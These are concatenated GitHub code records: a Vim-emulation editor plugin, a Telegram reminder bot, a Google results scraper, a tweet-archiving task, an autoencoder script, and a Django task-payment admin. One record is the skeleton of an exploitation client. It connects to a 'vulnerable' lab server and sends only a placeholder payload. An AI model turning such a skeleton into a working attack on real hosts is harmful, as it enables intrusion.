import status_message\n\n\ndef goto_help(window) -> None:\n view = window.active_view()\n if not view:\n raise ValueError('view is required')\n\n if not view.sel():\n raise ValueError('selection is required')\n\n sel = view.sel()[0]\n\n score = view.score_selector(sel.b, 'text.neovintageous jumptag')\n\n # TODO go to help for any word in a help file. See :h bar. Anyway, you can\n # use CTRL-] on any word, also when it is not within |, and Vim will try to\n # find help for it. 
Especially for options in single quotes, e.g.\n # 'compatible'.\n\n if score == 0:\n return\n\n subject = view.substr(view.extract_scope(sel.b))\n if not subject:\n return\n\n if len(subject) > 50:\n return status_message('E149: Sorry, no help found')\n\n # TODO Refactor ex cmd internets to this common utility\n from NeoVintageous.nv.ex_cmds import do_ex_command\n do_ex_command(window, 'help', {'subject': subject})\n\n\ndef goto_line(view, mode: str, line_number: int) -> None:\n line_number = line_number if line_number > 0 else 1\n dest = view.text_point(line_number - 1, 0)\n\n def f(view, s):\n if mode == NORMAL:\n pt = next_non_blank(view, dest)\n if view.substr(pt) == EOF:\n pt = max(pt - 1, 0)\n\n return Region(pt)\n elif mode == INTERNAL_NORMAL:\n start_line = view.full_line(s.a)\n dest_line = view.full_line(dest)\n if start_line.a == dest_line.a:\n return dest_line\n elif start_line.a < dest_line.a:\n return Region(start_line.a, dest_line.b)\n else:\n return Region(start_line.b, dest_line.a)\n elif mode == VISUAL:\n dest_non_blank = next_non_blank(view, dest)\n if dest_non_blank < s.a and s.a < s.b:\n return Region(s.a + 1, dest_non_blank)\n elif dest_non_blank < s.a:\n return Region(s.a, dest_non_blank)\n elif dest_non_blank > s.b and s.a > s.b:\n return Region(s.a - 1, dest_non_blank + 1)\n return Region(s.a, dest_non_blank + 1)\n elif mode == VISUAL_LINE:\n if dest < s.a and s.a < s.b:\n return Region(view.full_line(s.a).b, dest)\n elif dest < s.a:\n return Region(s.a, dest)\n elif dest >= s.a and s.a > s.b:\n return Region(view.full_line(s.a - 1).a, view.full_line(dest).b)\n return Region(s.a, view.full_line(dest).b)\n return s\n\n jumplist_update(view)\n regions_transformer(view, f)\n jumplist_update(view)\n show_if_not_visible(view)\n\n\ndef _goto_modification(action: str, view, mode: str, count: int) -> None:\n with wrapscan(view, forward=(action == 'next')):\n if int(version()) >= 3189:\n for i in range(count):\n view.run_command(action + '_modification')\n\n a = view.sel()[0].a\n if view.substr(a) == '\\n':\n if not view.line(a).empty():\n a += 1\n\n set_selection(view, a)\n enter_normal_mode(view, mode)\n else:\n # TODO Remove DEPRECATED code, deprecated since build 3189\n view.run_command('git_gutter_' + action + '_change', {'count': count, 'wrap': False})\n line = view.line(view.sel()[0].b)\n if line.size() > 0:\n pt = view.find('^\\\\s*', line.begin()).end()\n if pt != line.begin():\n set_selection(view, pt)\n\n\ndef goto_next_change(view, mode: str, count: int) -> None:\n _goto_modification('next', view, mode, count)\n\n\ndef goto_prev_change(view, mode: str, count: int) -> None:\n _goto_modification('prev', view, mode, count)\n\n\ndef goto_next_mispelled_word(view, mode: str, count: int) -> None:\n with wrapscan(view):\n for i in range(count):\n view.run_command('next_misspelling')\n\n regions_transform_to_normal_mode(view)\n\n\ndef goto_prev_mispelled_word(view, mode: str, count: int) -> None:\n with wrapscan(view, forward=False):\n for i in range(count):\n view.run_command('prev_misspelling')\n\n regions_transform_to_normal_mode(view)\n\n\ndef goto_prev_target(view, mode: str, count: int, target: str) -> None:\n targets = {\n '{': ('\\\\{', '\\\\}'),\n '(': ('\\\\(', '\\\\)'),\n }\n\n brackets = targets.get(target)\n if not brackets or mode not in (NORMAL, VISUAL, VISUAL_LINE):\n ui_bell()\n return\n\n def f(view, s):\n if mode == NORMAL:\n start = s.b\n if view.substr(start) == target:\n start -= 1\n\n prev_target = find_prev_lone_bracket(view, start, brackets)\n if 
prev_target is not None:\n return Region(prev_target.a)\n\n elif mode in (VISUAL, VISUAL_LINE):\n start = s.b\n if s.b > s.a:\n start -= 1\n\n if view.substr(start) == target:\n start -= 1\n\n prev_target = find_prev_lone_bracket(view, start, brackets)\n if prev_target:\n if mode == VISUAL:\n resolve_visual_target(s, prev_target.a)\n elif mode == VISUAL_LINE:\n resolve_visual_line_target(view, s, prev_target.a)\n\n return s\n\n regions_transformer(view, f)\n\n\ndef goto_next_target(view, mode: str, count: int, target: str) -> None:\n targets = {\n '}': ('\\\\{', '\\\\}'),\n ')': ('\\\\(', '\\\\)'),\n }\n\n brackets = targets.get(target)\n\n if not brackets or mode not in (NORMAL, VISUAL, VISUAL_LINE):\n ui_bell()\n return\n\n def f(view, s):\n if mode == NORMAL:\n start = s.b\n if view.substr(start) == target:\n start += 1\n\n bracket = find_next_lone_bracket(view, start, brackets, count)\n if bracket is not None:\n s = Region(bracket.a)\n\n elif mode in (VISUAL, VISUAL_LINE):\n start = s.b\n if s.b <= s.a and view.substr(start) == target:\n start += 1\n\n next_target = find_next_lone_bracket(view, start, brackets)\n if next_target:\n if mode == VISUAL:\n resolve_visual_target(s, next_target.a)\n elif mode == VISUAL_LINE:\n resolve_visual_line_target(view, s, next_target.a)\n\n return s\n\n regions_transformer(view, f)\n","repo_name":"emilBeBri/xucinet-tmp","sub_path":"NeoVintageous/nv/goto.py","file_name":"goto.py","file_ext":"py","file_size_in_byte":7476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20543431752","text":"import socket\nimport sys\n\n# create socket, of type INET, TCP\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint ('Socket Created')\n\n# define host for connection\nhost = ('192.168.159.128')\nport = 12626\nremote_ip = socket.gethostbyname(host)\nprint (\"IP Address of the vulnerbale server xmas, is \" + remote_ip)\n\n# connect to host \ns.connect((remote_ip, port))\nprint(\"socket connecte to \" + host)\n\n# receive and print server side communication\nreply = s.recv(1024)\nprint (reply)\n\n# send message from client \nmessage = 'code here'\ns.sendall(message)\n\n","repo_name":"donaldashdown/Client-side-socket-script-Exploitation","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18106227185","text":"from datetime import datetime, timedelta\nimport typing\n\nfrom aiogram import types\n\nfrom . import callback_data\nfrom .. 
import dependencies\n\n\n# NOTE: the Telegram API caps callback data at 64 bytes, so use short codes\n_TOMORROW_MORNING = 'TM'\n_TOMORROW_EVENING = 'TE'\n_SATURDAY_MORNING = 'SM'\n\n\ndef build_remind_keyboard() -> types.InlineKeyboardMarkup:\n keys = []\n method = callback_data.Methods.LATER\n buttons = (\n ('Tomorrow morning', _TOMORROW_MORNING),\n ('Tomorrow evening', _TOMORROW_EVENING),\n ('On Saturday morning', _SATURDAY_MORNING),\n )\n for text, when in buttons:\n keys.append(\n types.InlineKeyboardButton(\n text=text,\n callback_data=callback_data.CallbackData(\n method=method,\n payload={'when': when},\n ).serialize()\n ),\n )\n return types.InlineKeyboardMarkup(inline_keyboard=[keys])\n\n\ndef find_next_saturday(now: datetime) -> datetime:\n saturday = 5\n weekday = now.weekday()\n if weekday < saturday:\n delta = saturday - weekday\n elif weekday == saturday:\n delta = 7\n else:\n delta = 6\n return now + timedelta(days=delta)\n\n\ndef _get_queue_time(now: datetime, when: str) -> typing.Optional[datetime]:\n if when == _TOMORROW_MORNING:\n result = now + timedelta(days=1)\n return result.replace(hour=9, minute=0)\n if when == _TOMORROW_EVENING:\n result = now + timedelta(days=1)\n return result.replace(hour=21, minute=0)\n if when == _SATURDAY_MORNING:\n result = find_next_saturday(now).replace(hour=9, minute=0)\n return result\n return None\n\n\nasync def button_callback(\n deps: dependencies.Dependencies,\n user_id: str,\n message_id: int,\n data: callback_data.CallbackData,\n):\n now = datetime.now()\n until = _get_queue_time(now, data.payload['when'])\n if not until:\n return False\n queues = await deps.get_queues()\n await queues.enqueue_job(\n 'remind_later',\n user_id,\n message_id,\n _defer_until=until,\n )\n return True\n","repo_name":"IsThisLoss/manga-notify","sub_path":"manga_notify/bot/remind_later.py","file_name":"remind_later.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} {"seq_id":"71932009448","text":"#!/usr/bin/python3\nfrom add_0 import add\n\n# Assigning the value 1 to variable \"a\"\na = 1\n\n# Assigning the value 2 to variable \"b\"\nb = 2\n\n# Calling the \"add\" function from module \"add_0\" with arguments \"a\" and \"b\"\nresult = add(a, b)\n\n# Printing the formatted string with the result\nprint(\"{} + {} = {}\".format(a, b, result))\n","repo_name":"Emo-Efe/alx-higher_level_programming","sub_path":"0x02-python-import_modules/0-add.py","file_name":"0-add.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"24958792415","text":"import selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.chrome.options import Options\nfrom time import sleep\nimport time, os\nfrom datetime import datetime\nimport csv\nimport sys\n\n\ndef get_serp_by_query(driver, query, serp_folder_path):\n \"\"\"\n Search Google for the given query and save the result page (SERP) as HTML.\n Parameters:\n query - a string that contains the phrase that will be searched\n serp_folder_path - a path to the folder where the resulting SERPs are saved\n \"\"\"\n # load the results page in the browser so the full SERP renders\n url = f\"https://google.com/search?q={query}\"\n driver.get(url)\n sleep(2)\n # Access the content of the page\n htmlPage = driver.page_source\n filename = query.replace('/','')\n with open(f\"{serp_folder_path}/{filename}.html\", 'w', encoding='utf-8') as output:\n output.write(htmlPage)\n
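\n# Example (hypothetical arguments): get_serp_by_query(driver, 'test query', 'Gender Identities/2020-01-01')\n# would save the rendered page to 'Gender Identities/2020-01-01/test query.html'.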
\n\ndef search_all_queries(queries_file_csv):\n # Set the driver path\n driverpath = 'driver/chromedriver'\n chrome_options = webdriver.ChromeOptions()\n\n category_folder_path = queries_file_csv.split('_')[1].split('.')[0]\n serp_folder_path = str(datetime.now()).split()[0]\n \n # create the category and dated output folders if they do not exist yet\n os.makedirs(f'{category_folder_path}/{serp_folder_path}', exist_ok=True)\n\n queries = []\n with open(queries_file_csv, 'r') as inputF:\n reader = csv.reader(inputF)\n for row in reader:\n queries.append(row[0])\n\n # Create a single driver instance and reuse it for every search\n driver = webdriver.Chrome(executable_path=driverpath, options=chrome_options)\n for query in queries:\n get_serp_by_query(driver, query, f\"{category_folder_path}/{serp_folder_path}\")\n driver.close()\n\nif __name__ == \"__main__\":\n search_all_queries(sys.argv[1]) # parameter is a path to a csv file with a query list, like 'list_Gender Identities.csv' ","repo_name":"malika07032/serp_scraper","sub_path":"get_serps.py","file_name":"get_serps.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"33056991679","text":"from __future__ import absolute_import\nimport csv\nimport shutil\nfrom django.conf import settings\n\nfrom celery import Celery\nfrom celery.utils.log import get_task_logger\nfrom twython import Twython\n\nfrom twitter_archive import creds\nfrom twitter_archive.models import TwitterSearch\n\napp = Celery(broker='amqp://')\nlogger = get_task_logger(__name__)\n\n\n@app.task\ndef delete_tweets(path):\n shutil.rmtree(path, ignore_errors=True)\n\n\n@app.task\ndef collect_tweets():\n for search in TwitterSearch.objects.filter(active=True):\n user = search.user\n twitter = Twython(\n creds.APP_KEY,\n creds.APP_SECRET,\n user.twitterprofile.oauth_token,\n user.twitterprofile.oauth_secret,\n )\n # Run the search\n result = twitter.search(\n q=search.query,\n result_type=search.type,\n lang='en',\n count=100 if settings.MAX_TWEETS - search.collected > 100 else settings.MAX_TWEETS - search.collected,\n since_id=search.last_tweet_id,\n )\n\n # Write the tweets\n with open(search.csv_path, 'a') as out:\n writer = csv.writer(out)\n for tweet in result['statuses']:\n user = tweet.get('user', {})\n writer.writerow([\n tweet.get('created_at', '').encode('utf-8'),\n tweet.get('id_str', '').encode('utf-8'),\n tweet.get('in_reply_to_user_id_str', ''),\n tweet.get('retweet_count', 0),\n user.get('name', '').encode('utf-8'),\n user.get('profile_image_url', '').encode('utf-8'),\n user.get('location', '').encode('utf-8'),\n tweet.get('coordinates', ''),\n tweet.get('text', '').encode('utf-8'),\n ])\n\n # Save stats\n search.last_tweet_id = result['search_metadata']['max_id_str']\n search.collected += len(result['statuses'])\n if search.collected >= settings.MAX_TWEETS:\n search.active = False\n search.save()\n","repo_name":"Kapiche/twitter_archive","sub_path":"twitter_archive/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"10746016073","text":"import numpy as np\r\n\r\ndef f(w,b,x):\r\n\treturn 1.0 / (1.0 + np.exp(-(w*x + b)))\r\n\t\r\ndef grad_w(w,b,x):\r\n\t# partial derivative of the sigmoid output with respect to w: f'(z)*x, with f'(z) = f*(1-f)\r\n\tfx = f(w,b,x)\r\n\treturn fx * (1 - fx) * x\r\n\r\ndef grad_b(w,b,x):\r\n\t# partial derivative of the sigmoid output with respect to b: f*(1-f)\r\n\tfx = f(w,b,x)\r\n\treturn fx * (1 - fx)\r\n\t\r\ndef loss(w,b):\r\n\terror = 0\r\n\terror += 0.5 * (w - b) ** 2\r\n\treturn error\r\n
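\r\n# Sanity check of the partials, worked by hand: with w = 0, b = 0, x = 1,\r\n# f = sigmoid(0) = 0.5, so grad_w = 0.5 * 0.5 * 1 = 0.25 and grad_b = 0.25.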
\r\n\r\nparameters1 = np.load('autoencoder1.npy')\r\nw_e_1 = parameters1[0]\r\nb_1 = parameters1[1]\r\nw_d_1 = parameters1[2]\r\ne_1 = parameters1[3]\r\nw = grad_w(w_e_1, b_1, e_1) # argument order matches the (w, b, x) signature\r\n#b = grad_b(w_e_1, b_1, w_d_1)\r\n\r\nprint(b_1)\r\nparameters2 = np.load('autoencoder2.npy')\r\nw_e_2 = parameters2[0]\r\nb_2 = parameters2[1]\r\nw_d_2 = parameters2[2]\r\ne_2 = parameters2[3]","repo_name":"princeamitlali/gradient_descent","sub_path":"deep/autoencoder11.py","file_name":"autoencoder11.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"9168712994","text":"from django.contrib import admin\nfrom tasks.models import Task, TaskDocument, Schedule, PartialTaskPay, PaymentAhead\nfrom dynamic_costs.models import DynamicCost, ApartmentDynamicCost\nfrom nomenclatures.models import TaskType, Priority\nfrom django.contrib.auth.models import User\nfrom entrances.models import Apartment, Entrance\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.admin import SimpleListFilter\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Q\nimport datetime\nfrom django.utils.encoding import force_text\nfrom django.http import HttpResponse\nfrom django.conf.urls import url, patterns\nfrom django.forms.extras.widgets import SelectDateWidget\nfrom django.db import models\nfrom vhodove.helper import first_day_of_month\nfrom django.views.generic import View\n\nfrom vhodove.utils import render_to_pdf #created in step 4\n\nclass ApartmentsListFilter(SimpleListFilter):\n title = _('Apartment')\n parameter_name = 'apartment'\n\n def lookups(self, request, model_admin):\n return Apartment.objects.filter(entrance_id=request.GET.get('entrance__id__exact', 0)).values_list('id', 'apartment')\n\n def queryset(self, request, queryset):\n if self.value():\n return queryset.filter(apartment_id=self.value())\n else:\n return queryset\n\n# Rajdeep Code\n\nclass TimespanListFilter(SimpleListFilter):\n title = _('Timespan')\n parameter_name = 'timespan'\n\n def lookups(self, request, model_admin):\n return (\n ('past',_('Till Now')),\n ('future',_('From Now'))\n )\n\n def queryset(self, request, queryset):\n if self.value() == 'past':\n return queryset.filter(updated_at__lte=datetime.date.today())\n\n if self.value() == 'future':\n return queryset.filter(updated_at__gte=datetime.date.today())\n\n# End\n\n\nclass FloorListFilter(SimpleListFilter):\n title = _('Floor')\n parameter_name = 'floor'\n\n def lookups(self, request, model_admin):\n return Apartment.FLOORS\n\n def queryset(self, request, queryset):\n if self.value():\n return queryset.filter(apartment__floor=self.value())\n else:\n return queryset\n\n\nclass ResolvedListFilter(SimpleListFilter):\n title = _('Resolved')\n parameter_name = 'resolved__exact'\n\n def lookups(self, request, model_admin):\n return ((2, _('Yes')), (1, _('No')), (-1, _('All')))\n\n def choices(self, cl):\n for lookup, title in self.lookup_choices:\n yield {\n 'selected': self.value() == force_text(lookup),\n 'query_string': cl.get_query_string({\n self.parameter_name: lookup,\n }, []),\n 'display': title,\n }\n\n def queryset(self, request, queryset):\n if self.value() and self.value() != '-1':\n value = int(self.value()) - 1\n return queryset.filter(resolved=value)\n else:\n return queryset\n\nclass EntranceListFilter(SimpleListFilter):\n title = _('Entrance')\n parameter_name = 'entrance__id__exact'\n\n def 
lookups(self, request, model_admin):\n return [(c.id, \"%s. %s\" %(c.position, c.title)) for c in Entrance.objects.filter(active=True)]\n\n def queryset(self, request, queryset):\n if self.value():\n return queryset.filter(entrance__id__exact=self.value())\n else:\n return queryset\n\nclass ResolvedByAdminListFilter(SimpleListFilter):\n title = _('Resolved by admin')\n parameter_name = 'resolved_by_admin__exact'\n\n def lookups(self, request, model_admin):\n return ((2, _('Yes')), (1, _('No')), (-1, _('All')))\n\n def choices(self, cl):\n for lookup, title in self.lookup_choices:\n yield {\n 'selected': self.value() == force_text(lookup),\n 'query_string': cl.get_query_string({\n self.parameter_name: lookup,\n }, []),\n 'display': title,\n }\n\n def queryset(self, request, queryset):\n if self.value() and self.value() != '-1':\n value = int(self.value()) - 1\n return queryset.filter(resolved_by_admin=value)\n else:\n return queryset\n\nclass HasEasyPayListFilter(SimpleListFilter):\n title = _('Easypay code')\n parameter_name = 'easypay'\n\n def lookups(self, request, model_admin):\n return ((2, _('Yes')), (1, _('No')), (-1, _('All')))\n\n def choices(self, cl):\n for lookup, title in self.lookup_choices:\n yield {\n 'selected': self.value() == force_text(lookup),\n 'query_string': cl.get_query_string({\n self.parameter_name: lookup,\n }, []),\n 'display': title,\n }\n\n def queryset(self, request, queryset):\n if self.value() and self.value() != '-1':\n value = int(self.value())\n if value == 2:\n return queryset.filter(easypay_code__isnull=False)\n else:\n return queryset.filter(easypay_code__isnull=True)\n\n else:\n return queryset\n\n\nclass TaskDocumentInlines(admin.TabularInline):\n model = TaskDocument\n extra = 0\n\n\nclass PartialTaskPayInlines(admin.TabularInline):\n model = PartialTaskPay\n extra = 0\n\n readonly_fields = ['assignee', 'created_at']\n\n#Rajdeep Code Start\nclass PartialTaskPayAdmin(admin.ModelAdmin):\n from rangefilter.filter import DateRangeFilter, DateTimeRangeFilter\n search_fields = ('assignee__username','assignee__first_name','assignee__last_name')\n list_display = ('assignee','task','created_at','price','easypay_code')\n list_filter = (\n ('created_at', DateRangeFilter),\n # ('created_at', DateTimeRangeFilter),\n )\n#End\n\n\nclass PaymentAheadAdmin(admin.ModelAdmin):\n list_display = ('entrance', 'apartment', 'assignee', 'from_date', 'period')\n list_filter = (EntranceListFilter, ApartmentsListFilter, 'assignee')\n list_display_links = None\n #readonly_fields = ['from_date',]\n\n def get_form(self, request, obj=None, **kwargs):\n y = datetime.date.today().year\n m = datetime.date.today().month + 1\n if m == 13:\n m = 1\n y = y+1\n form = super(PaymentAheadAdmin, self).get_form(request, obj, **kwargs)\n form.base_fields['from_date'].initial = first_day_of_month(datetime.date(y, m, 1))\n return form\n\n\n def get_apartment_payment_fee(self, request):\n try:\n o = Apartment.objects.get(pk=request.GET.get('apartment_id'))\n return HttpResponse(o.monthly_fee)\n except:\n return HttpResponse(0)\n\n def get_urls(self):\n urls = super(PaymentAheadAdmin, self).get_urls()\n my_urls = patterns('',\n url(\n r'^get_apartment_payment_fee/$',\n self.admin_site.admin_view(self.get_apartment_payment_fee)\n ),\n )\n return my_urls + urls\n\n\n def has_change_permission(self, request, obj=None):\n return obj is None\n\n def has_delete_permission1(self, request, obj=None):\n return False\n\n def save_model(self, request, obj, form, change):\n obj.assignee = request.user\n 
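# the acting cashier was stamped on the record above; now persist the payment\n 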
obj.save()\n\n\nclass TaskAdmin(admin.ModelAdmin):\n search_fields = ('title', 'entrance__title', 'apartment__apartment')\n list_display = ('id', 'title', 'entrance', 'apartment')\n list_display_links = ('title', 'entrance', 'apartment')\n # list_filter = (TimespanListFilter,)\n list_per_page = 50\n actions = ['mark_as_resolved_by_admin', 'mark_as_resolved', 'unmark_as_resolved_by_admin', 'unmark_as_resolved']\n\n def mark_as_resolved_by_admin(self, request, queryset):\n queryset.update(resolved_by_admin=True)\n mark_as_resolved_by_admin.short_description = _(\"Mark as resolved by admin\")\n\n def mark_as_resolved(self, request, queryset):\n queryset.update(resolved=True)\n mark_as_resolved.short_description = _(\"Mark as resolved\")\n\n def unmark_as_resolved_by_admin(self, request, queryset):\n queryset.update(resolved_by_admin=False)\n unmark_as_resolved_by_admin.short_description = _(\"Unmark as resolved by admin\")\n\n def unmark_as_resolved(self, request, queryset):\n queryset.update(resolved=False)\n unmark_as_resolved.short_description = _(\"Unmark as resolved\")\n\n formfield_overrides = {\n models.DateField: {'widget': SelectDateWidget(years=('2015','2016','2017','2018','2019','2020'))},\n }\n\n def get_actions(self, request):\n actions = super(TaskAdmin, self).get_actions(request)\n if 'delete_selected' in actions and not request.user.is_superuser:\n del actions['delete_selected']\n\n if not request.user.is_superuser:\n del actions['mark_as_resolved_by_admin']\n del actions['mark_as_resolved']\n del actions['unmark_as_resolved_by_admin']\n del actions['unmark_as_resolved']\n return actions\n\n def formfield_for_foreignkey(self, db_field, request=None, **kwargs):\n field = super(TaskAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)\n if db_field.name == 'task_type':\n if request.user.is_superuser or 4 in request.user.groups.all().values_list('id', flat=True):\n field.queryset = field.queryset.all()\n else:\n field.queryset = field.queryset.filter(for_cachiers=True)\n\n if db_field.name == 'entrance':\n if request.user.is_superuser or 4 in request.user.groups.all().values_list('id', flat=True):\n field.queryset = field.queryset.all()\n else:\n # limit the entrance choices to the cashier's currently scheduled entrances\n entrance_ids = Schedule.objects.filter(assignee=request.user, from_date__lte=datetime.datetime.now(), to_date__gte=datetime.datetime.now()).values_list('entrance_id')\n field.queryset = field.queryset.filter(id__in=entrance_ids)\n\n return field\n\n def save_formset(self, request, form, formset, change):\n instances = formset.save(commit=False)\n\n for instance in instances:\n if isinstance(instance, PartialTaskPay): # Check if it is the correct type of inline\n if not instance.assignee_id:\n instance.assignee = request.user\n instance.save()\n super(TaskAdmin, self).save_formset(request, form, formset, change)\n\n def changelist_view(self, request, extra_context=None):\n self.assignees_list = {x['id']:x for x in User.objects.filter(is_staff=True).values('id','first_name','last_name')}\n self.priorities_list = dict(Priority.objects.all().values_list('id','color'))\n self.task_types_list = dict(TaskType.objects.all().values_list('id','title'))\n self.apartments_list = {x['id']:x for x in Apartment.objects.filter(id__in=self.get_queryset(request).values_list('apartment_id', flat=True)).values('id','floor','contact_person','contact_phone', 'contact_email', 'pay_online', 'apartment', 'number_of_occupants')}\n if 
request.user.is_superuser or 4 in request.user.groups.all().values_list('id', flat=True):\n # self.list_filter = (ResolvedListFilter, ResolvedByAdminListFilter, HasEasyPayListFilter, EntranceListFilter, ApartmentsListFilter, FloorListFilter, 'assignee', 'task_type', 'priority')\n\n # Rajdeep Code Start\n self.list_filter = (TimespanListFilter,ResolvedListFilter, ResolvedByAdminListFilter, HasEasyPayListFilter, EntranceListFilter, ApartmentsListFilter, FloorListFilter, 'assignee', 'task_type', 'priority')\n\n # End\n self.list_editable = ('document',)\n if 'entrance__id__exact' in request.GET:\n if request.GET.get('resolved_by_admin__exact',0) == '2':\n self.list_per_page = 50\n else:\n self.list_per_page = 50000\n self.list_display = ('get_priority', 'title', 'get_apartment', 'get_floor', 'get_contact_info', 'get_occupants','price', 'partial_paid_total', 'get_date', 'get_assignee', 'normalized_time', 'get_task_type','resolved', 'resolved_by_admin')\n else:\n self.list_per_page = 50\n self.list_display = ('get_priority', 'title', 'entrance', 'get_apartment', 'get_floor', 'get_contact_info', 'get_occupants', 'price', 'partial_paid_total', 'get_date', 'get_assignee', 'normalized_time', 'get_task_type','resolved', 'resolved_by_admin')\n\n if not request.GET.has_key('resolved__exact'):\n q = request.GET.copy()\n q['resolved__exact'] = '1'\n request.GET = q\n request.META['QUERY_STRING'] = request.GET.urlencode()\n\n if not request.GET.has_key('resolved_by_admin__exact'):\n q = request.GET.copy()\n q['resolved_by_admin__exact'] = '1'\n request.GET = q\n request.META['QUERY_STRING'] = request.GET.urlencode()\n else:\n # self.list_filter = (ResolvedListFilter, EntranceListFilter, ApartmentsListFilter, FloorListFilter) #old\n\n # Rajdeep Code Start\n if request.user.is_staff:\n self.list_filter = (ResolvedListFilter, EntranceListFilter, ApartmentsListFilter, FloorListFilter)\n else:\n self.list_filter = (ResolvedListFilter, ApartmentsListFilter, FloorListFilter)\n # End\n self.list_editable = ('document',)\n if 'entrance__id__exact' in request.GET:\n self.list_display = ('get_priority', 'title', 'get_apartment', 'get_floor', 'get_contact_info','get_occupants', 'price', 'partial_paid_total', 'date', 'get_task_type','resolved')\n else:\n self.list_display = ('get_priority', 'title', 'entrance', 'get_apartment', 'get_floor', 'get_contact_info', 'get_occupants', 'price', 'partial_paid_total', 'date', 'get_task_type','resolved')\n\n\n if not request.GET.has_key('resolved__exact'):\n q = request.GET.copy()\n q['resolved__exact'] = '1'\n request.GET = q\n request.META['QUERY_STRING'] = request.GET.urlencode()\n\n extra_context = extra_context or {}\n from django.db.models import Sum\n ChangeList = self.get_changelist(request)\n cl = ChangeList(request, self.model, self.list_display, self.list_display_links, self.list_filter, self.date_hierarchy, self.search_fields, self.list_select_related, self.list_per_page, self.list_max_show_all, self.list_editable, self)\n qs = cl.get_queryset(request)\n sum_price = qs.aggregate(Sum('price'))['price__sum']\n sum_partial =qs.aggregate(Sum('partial_paid_total'))['partial_paid_total__sum']\n sum_price = sum_price if sum_price else 0\n sum_partial = sum_partial if sum_partial else 0\n extra_context['total'] = sum_price - sum_partial\n extra_context['has_entrance_filter'] = 'entrance__id__exact' in request.GET and self.list_per_page > 50\n return super(TaskAdmin, self).changelist_view(request, extra_context)\n\n def get_contact_info(self, obj):\n if obj.apartment_id:\n 
return 'Easypay: 101%s
%s
%s
%s
%s' % (reverse('admin:entrances_apartment_change', args=[obj.apartment_id]), obj.apartment_id, self.apartments_list[obj.apartment_id]['contact_person'], self.apartments_list[obj.apartment_id]['contact_phone'] or '-', self.apartments_list[obj.apartment_id]['contact_email'] or '-', _('Pay online') if self.apartments_list[obj.apartment_id]['pay_online'] else '')\n else:\n return None\n get_contact_info.short_description = _('Get Contact info')\n get_contact_info.allow_tags = True\n\n def get_priority(self, obj):\n return '' % (self.priorities_list[obj.priority_id])\n\n get_priority.short_description = ''\n get_priority.allow_tags = True\n\n def normalized_time(self, obj):\n return obj.updated_at.strftime(\"%d.%m.%Y\")\n normalized_time.short_description = _('Updated at')\n\n def get_apartment(self, obj):\n if obj.apartment_id:\n return self.apartments_list[obj.apartment_id]['apartment']\n else:\n return None\n get_apartment.short_description = _('Apartment')\n get_apartment.admin_order_field = 'apartment__apartment_integer'\n\n def get_floor(self, obj):\n if obj.apartment_id:\n return self.apartments_list[obj.apartment_id]['floor']\n else:\n return None\n get_floor.admin_order_field = 'apartment__floor'\n get_floor.short_description = _('Floor')\n\n\n def get_task_type(self, obj):\n return self.task_types_list[obj.task_type_id]\n get_task_type.short_description = _('Task type')\n\n def get_assignee(self, obj):\n if obj.assignee_id and obj.assignee_id in self.assignees_list:\n return \"%s %s\" %(self.assignees_list[obj.assignee_id]['first_name'], self.assignees_list[obj.assignee_id]['last_name'])\n else:\n return ''\n get_assignee.short_description = _('User')\n\n\n\n\n def get_occupants(self, obj):\n if obj.apartment_id:\n return self.apartments_list[obj.apartment_id]['number_of_occupants']\n else:\n return None\n get_occupants.admin_order_field = 'apartment__number_of_occupants'\n get_occupants.short_description = _('Number of occupants')\n\n def readonly_clickable_document(self, instance):\n return '%s' %(instance.document.url,instance.document)\n\n readonly_clickable_document.short_description = _('Document')\n readonly_clickable_document.allow_tags = True\n\n def get_readonly_fields(self, request, obj=None):\n if obj and obj.resolved_by_admin and not request.user.is_superuser:\n return list(set(\n [field.name if field.editable and field.name not in ['document', 'can_pay_partial', 'can_pay', 'price_for_resolve'] else 'id' for field in self.opts.local_fields] +\n [field.name for field in self.opts.local_many_to_many] +\n ['readonly_clickable_document']\n ))\n\n return self.readonly_fields\n\n def get_form(self, request, obj=None, **kwargs):\n self.readonly_fields = []\n self.exclude = ['templates', 'can_pay', 'can_pay_partial']\n if obj and obj.resolved_by_admin and not request.user.is_superuser:\n self.exclude.append('document')\n if obj:\n self.readonly_fields = ['task_type', 'apartment', 'entrance', 'easypay_code']\n\n #if not obj.task_type.can_pay:\n # self.exclude.append('price')\n\n if not obj.task_type.can_pay_partial:\n #self.exclude.append('partial_paid')\n self.inlines = [TaskDocumentInlines]\n else:\n self.inlines = [PartialTaskPayInlines, TaskDocumentInlines]\n\n if not request.user.is_superuser and 4 not in request.user.groups.all().values_list('id', flat=True):\n self.exclude.append('resolved_by_admin')\n self.exclude.append('assignee')\n self.exclude.append('apartment')\n if obj is not None and obj.task_type.can_pay_partial:\n self.readonly_fields.append('resolved')\n 
